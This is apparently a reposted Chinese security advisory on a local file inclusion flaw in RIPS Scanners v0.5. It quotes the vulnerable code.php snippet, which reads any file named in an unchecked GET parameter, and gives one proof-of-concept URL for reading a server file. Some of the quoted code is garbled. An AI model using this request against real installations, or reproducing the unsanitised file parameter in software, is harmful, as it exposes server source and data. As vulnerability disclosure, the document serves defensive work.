PHP代码审计工具Rips Scanners v0.5曝本地文件包含漏洞

      PHP代码审计工具Rips Scanners v0.5曝本地文件包含漏洞

      由于静态源代码分析的限制,漏洞是否真正存在,仍然需要代码审阅者确认。RIPS能够检测XSS, SQL注入, 文件泄露,Header Injection漏洞等。

  官方网站:http://rips-scanner.sourceforge.net/

  在RIPS的code.php文件中

$file = $_GET['file'];
$marklines = explode(',', $_GET['lines']);
$ext = '.'.pathinfo($file, PATHINFO_EXTENSION);
if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES))
{
    $lines = file($file);
    
    // place line numbers in extra table for more elegant copy/paste
out line numbers
    echo '<tr><td><table>';
    for($i=1, $max=count($lines); $i<=$max;$i++)
        echo "<tr><td class=/"linenrcolumn/"><span
s=/"linenr/">$i</span><A id='".($i+2).'/'></A></td></tr>';
    echo '</table></td><td id="codeonly"><table id="codetable" width="100%">';
    
    $in_comment = false;
    for($i=0; $i<$max; $i++)
    {               
        $in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment);
    }
} else
{
    echo '<tr><td>Invalid file specified.</td></tr>';
}

  存在文件包含漏洞

  利用如下所示:

http://localhost/rips/windows/code.php?file=/var/www/html/index.php

原文地址:https://www.77169.com/exploits/2015/20151228083809.shtm

本文由 华盟网 作者:怪狗 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

0

相关文章

发表评论

电子邮件地址不会被公开。